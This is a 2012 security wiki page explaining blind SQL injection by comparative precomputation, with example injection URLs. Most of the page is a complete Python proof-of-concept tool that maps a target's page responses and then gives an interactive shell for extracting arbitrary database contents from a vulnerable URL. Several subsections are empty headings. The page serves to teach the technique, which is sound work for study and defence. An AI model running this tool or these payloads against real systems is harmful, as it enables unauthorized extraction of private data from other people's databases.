Questions about this topic? Sign up to ask in the talk tab.

SQL injection/Blind/Extraction/Precomputation

From NetSec
Revision as of 09:03, 15 November 2012 by LashawnSeccombe (Talk | contribs) (Theory)

Jump to: navigation, search

Response-based data extraction allows for blind SQL injection exploitation to retrieve, in some cases, more than a single byte from the remote SQL database.

The author was able to determine that there are at least two ways to perform this task:

  • A timing attack, more suited for a LAN (Local Area Network)
  • A comparative precomputation attack, more suited for the WAN (Wide Area Network, or in this case, the internet)

This document focuses on the latter, for realistic exploitation demonstration.

The comparative precomputation attack

c3el4.png This attack heavily relies on the remote dataset for successful exploitation and thus its rate of data retrieval is more variable than other methods.

Requirements:

  • Before comparative precomputation can be initiated, an attacker or penetration tester must be aware of the vulnerable query's context (column and table names).
  • In order for it to be effectively faster than boolean enumeration, the contents of the query result context (column and table) must contain 3 or more instances of unique column and row data

Precomputation is done for performance and efficiency purposes. At the very least, a comparative test will be required - without precomputation, it is expected that ram usage may skyrocket. The more complex a remote site is (random content generation, etc), the more difficult this type of attack becomes to automate.

Theory

The example in this section will rarely (if ever) work in the wild. It is a more basic explaination to prepare the reader's comprehension of the more advanced explanation later. (skip to advanced explanation)

Exploitation is a two part process. The first part includes building the precomputed comparison table - the second part involves extracting data.

Building lookup tables

  • Take the following query
  $query = "select * from articles where id=" . $_GET['id']; 
  • Being executed at the following uri:
 /articles.php?id=1
  • Assume, for one moment, that there are 255 rows with sequential id's starting at 1 in the articles table. It will rarely ever be this way in the wild.
  • First, the attacker would crawl all of the pages at id's 1-255, saving them in a hashtable with the associated id used to generate the response.

Extracting a cell

  • To determine the ascii code of the first character of the sql version, an attacker might visit:
 /articles.php?id=ascii(substring(version() from 1 for 1))

The attacker would then take a checksum of the returned html data, and lookup its corresponding numeric id value saved during lookup table creation. This numeric id's value now corresponds with the ascii value of the first byte of the version. Following until the end of the cell, one could simply move to the next character:

 /articles.php?id=ascii(substring(version() from 2 for 1))

Extracting the length of a cell

Suppose the goal in this situation is to obtain the length of the string returned by SQL's native version() function. In some situations the database will treat the result of length() as a string or integer interchangably, however in some cases, casting may be required.

The simple method for length determination of the version, or any cell is to treat the length as a string; for example an attacker may visit:

 /articles.php?id=length((select length(version())))

This is because it is highly unlikely that the result of the version query will be longer than (9 * 10 ^ 255). Once the length of the length is determined by treating the length's length as a single byte and looking it up in the table, an attacker could grab single bytes of the length by their ascii codes:

 /articles.php?id=ascii(substring(length(version()),1,1))

An attacker would then treat the length as a single cell being extracted until its value is determined.

Surpassing obstacles

With the above example, exploitation in the wild is extremely unlikely, due to the fact that the id's in the articles table may not in fact be sequential - there may not even be 255 of them! Or what if the index column for the where clause is a string? What if there are duplicates in the retrieved data?

Non-sequential identifiers

Different SQL services provide different interfaces for solving this problem.

String column index

Duplicate http responses

Getting past the byte

Proof of Concept

#!/usr/bin/python2
import sys
import urllib2
import time
from binascii import hexlify
import _mysql
import md5
import pickle
import re
import os
import threading
import Queue
import readline
readline.parse_and_bind('tab: complete')
readline.parse_and_bind('set editing-mode vi')
 
BOLD = '\033[1m'
BLUE = '\033[34m'
GREEN = '\033[32m'
YELLOW = '\033[33m'
RED = '\033[91m'
ENDC = '\033[0m'
 
def request(request_url):
  req = urllib2.Request(request_url)
  req.add_header = ('User-agent', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_2) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.0.1309.0 Safari/537.17')
  r = urllib2.urlopen(req)
  return r.read()
 
def construct_discovery_query(url, column, table, counter):
  discovery = "(select %s from (select %s,@r:=@r+1 as pos from %s c join (select @r:=0) r limit 255) x where pos=%s)"
  discovery =  discovery % (column, column, table, counter)
  return url + urllib2.quote(discovery)
 
def construct_injection_query(url, column, table, query, position):
  injection = "(select %s from (select %s,@r:=@r+1 as pos from %s c join (select @r:=0) r limit 255) x where pos=ascii(substring(compress((%s)) from %s for 1)))"
  injection = injection % (column, column, table, query, position)
  return url + urllib2.quote(injection)
 
def get_length(url, column, table, query, ascii_table, counter):
  injection = "(select %s from (select %s,@r:=@r+1 as pos from %s c join (select @r:=0) r limit 255) x where pos=(length(length(compress((%s))))))" % (column, column, table, query)
  length_length = url + urllib2.quote(injection)
  length_length = ascii_table[md5.new(request(length_length)).digest()]
  counter += 1
 
  length = ""
  for i in range(1,length_length+1):
    injection = "(select %s from (select %s,@r:=@r+1 as pos from %s c join (select @r:=0) r limit 255) x where pos=ascii(substring(length(compress((%s))) from %s for 1)))" 
    injection = injection % (column, column, table, query, i)
    request_url = url + urllib2.quote(injection)
    length += chr(ascii_table[md5.new(request(request_url)).digest()])
    counter += 1
 
  return (int(length), counter)
 
def get_query(prompt):
  while 1:
    query = raw_input(prompt)
    if query != "":
      break
  return query
 
def do_query(url, column, table, query, ascii_table, i, q):
  tmp = construct_injection_query(url, column, table, query, i)
  q.put(chr(ascii_table[md5.new(request(tmp)).digest()]))
 
def do_table(url, column, table, i, q):
  tmp = construct_discovery_query(url, column, table, i)
  q.put(md5.new(request(tmp)).digest())
 
def print_percent(percent, start_time):
  elapsed_time = time.time() - start_time
  eta = ((elapsed_time) / percent) * 100 - elapsed_time
  sys.stdout.write("\r%s[*]%s Percent complete: %s%.2f%%%s -- Time elapsed: %s%.2f%s seconds -- Estimated time left: %s%.2f%s" % (GREEN, ENDC, YELLOW, percent, ENDC, YELLOW, elapsed_time, ENDC, YELLOW, eta, ENDC))
  sys.stdout.flush()
 
def do_thread(target, args, counter, length, type_query):
  if type_query == 0:
    ascii_table = {}
  else:
    query_result = ""
 
  if type_query == 0:
    i = 0
  else:
    i = 1
 
 
  sys.stdout.write("\r%s[*]%s Percent complete: %.2f%%" % (GREEN, ENDC, 0.0))
  sys.stdout.flush()
  start_time = time.time()
 
  while i < length:
    threads = {}
    queues  = []
 
    for j in range(0,11):
      if i < length:
        queues.append(Queue.Queue())
        threads[i] = threading.Thread(target=target, args=args + (i, queues[j]))
        i += 1
        counter += 1
        print_percent(100 * float(i) / float(length), start_time)
 
    for thread in threads:
      threads[thread].start()
 
    for j, thread in enumerate(sorted(threads.iterkeys())):
      if type_query == 0:
        ascii_table[queues[j].get()] = thread
      else:
        query_result += queues[j].get()
      threads[thread].join()
 
  sys.stdout.write('\n')
  sys.stdout.flush()
 
  if type_query == 0:
    return ascii_table
  else:
    return (counter, query_result)
 
def main(url, column, table):
  session_name = re.split("(https?://)?(.*)/", url)[2]
 
  print "%s[*]%s Checking for existing session" % (GREEN, ENDC)
  try:
    try:
      os.stat("data")
    except:
      os.mkdir("data")
    ascii_table = pickle.load(open("data/%s" % session_name, "rb" ))
    print "%s[*]%s Loaded precomputation table." % (GREEN, ENDC)
  except:
    print "%s[*]%s Building precomputation table.." % (GREEN, ENDC)
    current = time.time()
    ascii_table = do_thread(do_table, (url, column, table, ), 0, 256, 0)
    pickle.dump(ascii_table, open("data/%s" % session_name, "wb"))
    print "\n%s[*]%s Precomputation table built in %s%f%s seconds." % (GREEN, ENDC, YELLOW, time.time() - current, ENDC)
 
  print "%s[*]%s Enter a sql query:" % (GREEN, ENDC)
 
  while 1:
    query = get_query("%ssql shell>%s " % (BOLD, ENDC))
    if query == "exit":
      break
 
    query_result = ""
    counter = 0
    current = time.time()
    (length, counter) = get_length(url, column, table, query, ascii_table, counter)
 
    (counter, query_result) = do_thread(do_query, (url, column, table, query, ascii_table, ), counter, length+1, 1)
 
    query = "SELECT UNCOMPRESS(0x%s)" % hexlify(query_result)
    mysql_connection = _mysql.connect('localhost', 'root', 'new-password')
    mysql_connection.query(query)
    result = mysql_connection.use_result()
    data = result.fetch_row()[0][0]
    mysql_connection.close()
 
    print data
    print "\nRequests: %s%d%s (%s%f%s seconds)\nLength of retrieved data: %s%s%d%s%s" % (YELLOW, counter, ENDC, YELLOW, time.time() - current, ENDC, BOLD, YELLOW, len(data), ENDC, ENDC)
 
  print "%s[*]%s Good bye" % (GREEN, ENDC)
 
if __name__=="__main__":
  if len(sys.argv) != 4:
    print "Usage: %s <vulnerable url> <column name> <table name>" % sys.argv[0]
    exit()
 
  print "%s[*]%s Attacking: %s%s%s%s%s" % (GREEN, ENDC, BOLD, RED, sys.argv[1], ENDC, ENDC)
  main(sys.argv[1], sys.argv[2], sys.argv[3])